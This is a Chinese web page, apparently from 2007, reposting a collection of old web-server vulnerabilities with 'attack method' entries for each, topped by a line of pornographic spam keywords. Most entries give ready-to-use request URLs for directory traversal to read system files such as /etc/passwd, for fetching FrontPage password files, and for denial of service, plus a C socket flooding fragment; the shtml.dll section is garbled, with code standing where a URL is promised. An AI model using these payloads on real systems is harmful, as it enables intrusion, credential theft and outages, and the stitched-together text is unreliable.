亚洲乱码中文字幕综合,中国熟女仑乱hd,亚洲精品乱拍国产一区二区三区,一本大道卡一卡二卡三乱码全集资源,又粗又黄又硬又爽的免费视频

一些收集到的經(jīng)典漏洞詳解第1/2頁

 更新時間:2007年01月16日 00:00:00   作者:  
☆carbo.dll☆  
iCat Carbo服務(wù)器一個網(wǎng)絡(luò)購物程序,它被 PC雜評為最好的網(wǎng)絡(luò)購物軟件.安全專家Mikael Johansson發(fā)現(xiàn) iCat Carbo服務(wù)器版本 3.0.0.中存在一個漏洞, 

這個漏洞讓我們每個人查看系統(tǒng)中的任何文件在(除文件之外和一些特殊字符).  
攻擊方法:  

提交這樣的http請求 :  
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog  

http會做如下回應(yīng):  
[iCat Carbo Server (ISAPI, Release) Version 3.0.0 Release Build 244]  

Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'  

查看win.ini文件: c:\winnt\win.ini:  

http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog  
___________________________________________________________________________  
☆uploader.exe☆  

如果您使用NT作為您的WebServer的操作系統(tǒng),入侵者能夠利用uploader.exe上傳任何文件。  
攻擊方法: http://host/cgi-win/uploader.exe  
會帶你到上傳頁面,剩下的事就不用我告訴你了把?:)  
___________________________________________________________________________  
☆search97.vts☆  

這個文件將能使入侵者任意的讀取你系統(tǒng)中啟動httpd用戶能讀取的文件。  
攻擊方法: http://www.xxx.com/search97.vts  
?HLNavigate=On&querytext=dcm  
&ServerKey=Primary  
&ResultTemplate=../../../../../../../etc/passwd  
&ResultStyle=simple  
&ResultCount=20  
&collection=books  
___________________________________________________________________________  
☆newdsn.exe☆  

個存在于/scripts/tools目錄下的newdsn.exe文件允許任何一個用戶在web根目錄下創(chuàng)建任何文件。另外,在某些特定條件下,
利用newdsn.exe可能使IIS遭受拒絕服務(wù)攻擊,如果攻擊成功,將導(dǎo)致IIS停止響應(yīng)連接請求。  
攻擊方法:  
1. 創(chuàng)建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=Evil2+samples+from+microsoft&dbq=../../evil2.htm&newdb=CREATE_DB&attr=  
2. D.o.s攻擊:提交下列連接請求:  
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  

如果IIS是有問題的版本,瀏覽器將不會顯示任何信息。當(dāng)下列兩種情況中的任意一種發(fā)生時,都會導(dǎo)致拒絕服務(wù):  

- 重新啟動WWW服務(wù)時: 這將導(dǎo)致IIS掛起。不能重新啟動WWW服務(wù),總是顯示"端口已經(jīng)被占用"的錯誤信息。  
- 停止WWW服務(wù): IIS將會停止 。但是IIS的數(shù)據(jù)庫部分并沒有死掉,仍然會響應(yīng)80端口發(fā)來的請求,因此, 

如果再次提交一個請求: http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase  
IIS會產(chǎn)生保護(hù)性錯誤。  
___________________________________________________________________________  
☆service.pwd☆  

http://www.hostname.com/_vti_pvt/service.pwd可讀,將暴露用戶密碼信息.  
攻擊方法:  
訪問http://host/_vti_pvt/service.pwd [service.pwd]正是所需要的密碼文件,如果我們粗心的網(wǎng)管沒有設(shè)置權(quán)限的話,那瀏覽器就會顯示出對方的密碼文件。  

___________________________________________________________________________  
☆users.pwd☆  

UNix系統(tǒng)的http://www.hostname.com/_vti_pvt/users.pwd可讀,將暴露用戶密碼信息。  
攻擊方法:  
訪問http://www.hostname.com/_vti_pvt/users.pwd。  

___________________________________________________________________________  
☆authors.pwd☆  

UNix系統(tǒng)的http://www.hostname.com/_vti_pvt/authors.pwd可讀,將暴露用戶密碼信息。  
攻擊方法:  
訪問http://www.hostname.com/_vti_pvt/authors.pwd。  
___________________________________________________________________________  
☆administrators.pwd☆  

UNix系統(tǒng)的http://www.hostname.com/_vti_pvt/administrators.pwd可讀,將暴露用戶密碼信息。  
攻擊方法:  
訪問http://www.hostname.com/_vti_pvt/administrators.pwd。  

___________________________________________________________________________  
☆shtml.dll☆  

在Frontpage Extention Server/Windows2000 Server上輸入一個不存在的文件將可以得到web目錄的本地路徑信息.
 但是如果我們請求并非HTML、SHTML或者ASP后綴的文件,我們將會得到不同的信息. http://TrustedServer如果用戶點(diǎn)擊
上述指定的鏈接,腳本將通過HTTP請求從客戶端傳送給可信任的站點(diǎn),可信任站點(diǎn)然后將該腳本作為錯誤信息的一部分返回給客
戶端??蛻舳嗽谑盏桨撃_本的出錯頁面時,將執(zhí)行該腳本,并將賦予來自可信任站點(diǎn)的內(nèi)容的所有權(quán)力賦予該腳本。另外,
shtml.dll對較長的帶html后綴的文件名都會進(jìn)行識別和處理,利用這一點(diǎn),可以對IIS服務(wù)器執(zhí)行DOS攻擊,以下這個程序,
能使目標(biāo)服務(wù)器的CPU占用率達(dá)到 100%,并且耗用所有的應(yīng)用程序日志空間。系統(tǒng)在數(shù)分鐘內(nèi)會報告應(yīng)用程序日志已滿。  
攻擊方法:  
1. 暴露路徑:http://www.victim.com/_vti_bin/shtml.dll/something.html  
這樣將返回以下信息:  
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.  
2. 可信任站點(diǎn)執(zhí)行腳本:使用如下格式的URL:  
serv_addr.sin_family =AF_INET;  
serv_addr.sin_addr.s_addr = inet_addr("192.168.0.131");  
serv_addr.sin_port = htons(80);  

if ((sockfd =socket(AF_INET,SOCK_STREAM,0))<0)  
{  
printf("Create Socket faild \n");  
return ;  
}  

if (connect(sockfd,(struct sockaddr*)&serv_addr,sizeof(serv_addr))<0)  
{  
printf("Connect faild \n");;  
}  
else  
{  
lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 );  
for (lDo = 0 ;lDo < 7000;lDo ++)  
{  
lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd"),0) ;  
if (lLen < 0 )  
{  
printf("Send faild \n");  
return;  
}  
}  
lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n") + 1,0) ;  
//recv(sockfd,buffer,2000,0);  
//printf(buffer);  
//printf("\n");  
}  
closesocket(sockfd);  
}  


___________________________________________________________________________  
☆shtml.exe☆  

微軟的 FrontPage Server Extensions存在一個遠(yuǎn)程拒絕服務(wù)漏洞,可能遠(yuǎn)程關(guān)閉一個web站點(diǎn)上的所有FrontPage操作。
通過提交一個包含DOS設(shè)備名的鏈接, FrontPage Server Extensions就會掛起,不再響應(yīng)后續(xù)的請求。為了恢復(fù)正常工作,必須重新啟動IIS或者重新啟動機(jī)器。  
攻擊方法:  
提交這樣的鏈接,都可能使FrontPage Server Extensions停止響應(yīng): http://www.example.com/_vti_bin/shtml.exe/com1.htm http://www.example.com/_vti_bin/shtml.exe/
prn.htm http://www.example.com/_vti_bin/shtml.exe/aux.htm http://www.example.com/_vti_bin/shtml.exe
/prn.anything.here.htm http://www.example.com/_vti_bin/shtml.exe/com1.asp http://www.example.com/_
vti_bin/shtml.exe/com1 .  
___________________________________________________________________________  
☆queryhit.htm☆  

如果queryhit.htm提出一個搜索頁面,那么你便可以搜索和觀看這些文件。  
攻擊方法:  
訪問http://www.victim.com/samples/search/queryhit.htm 如果是搜索頁面,然后在查找文件對話框里輸入以下字符串:
[#filename=*.pwd],如果屏幕上出現(xiàn)一長串連接到以[.pwd]為擴(kuò)展名的密碼文件的話,那就是所需要的東東了。  
___________________________________________________________________________  
☆Dotdotdot☆  

vqServer及Sybase PowerDynamo網(wǎng)站服務(wù)器存在著一個老的攻擊漏洞,此攻擊是關(guān)于點(diǎn)點(diǎn)(..)的攻擊,這是由于在WINDOW
中允許連續(xù)的點(diǎn)被解釋為級連的目錄如'cd ...',解釋為'cd ..\..'.而Sybase PowerDynamo,老版本的vqServer允許遠(yuǎn)程攻擊
者繞過WEB安全系統(tǒng)橫貫到其他目錄。  
攻擊方法:  
假如CONFIG.SYS存在在根目錄下,就能讀文件。 http://example.com/...................../config.sys  
列出根目錄。 http://example.com/ /../../../../../../  
___________________________________________________________________________  
☆autoexec.bat☆  

現(xiàn)在很多web服務(wù)器上存在這個安全問題,例如Jana Webserver,URL Live 1.0 webserver等.惡意的用戶可能利用該漏洞來
退出HTTP root目錄,從而到達(dá)上層的目錄樹中.在URL中使用"../",攻擊者們可以獲得WEB SERVER有權(quán)讀取的任何文件.  
攻擊方法: :8080/../../../autoexec.bat 這樣將讀取畹統(tǒng)中的autoexec.bat文件  
這個漏洞的利用還取決于系統(tǒng)目錄的結(jié)構(gòu)而定.  
___________________________________________________________________________  
☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htraexp4b.htr anot.htr anot3.htr☆  

IIS4.0中包含一個有趣的特征就是允許遠(yuǎn)程用戶攻擊WEB服務(wù)器上的用戶帳號,就是你的WEB服務(wù)器是通過NAT來轉(zhuǎn)換地址的,
還可以被攻擊。每個IIS4.0安裝的時候建立一個虛擬目錄/iisadmpwd,這個目錄包含多個.htr文件,匿名用戶允許訪問這些文件,
這些文件剛好沒有規(guī)定只限制在loopback addr(127.0.0.1),請求這些文件就跳出對話框讓你通過WEB來修改用戶的帳號和密碼。
這個目錄物理映射在下面的目錄下:  
c:\winnt\system32\inetsrv\iisadmpwd  
攻擊方法:  
訪問:http://example.com/iisadmpwd/*.htr的頁面,并利用工具對其進(jìn)行窮舉。  

相關(guān)文章

最新評論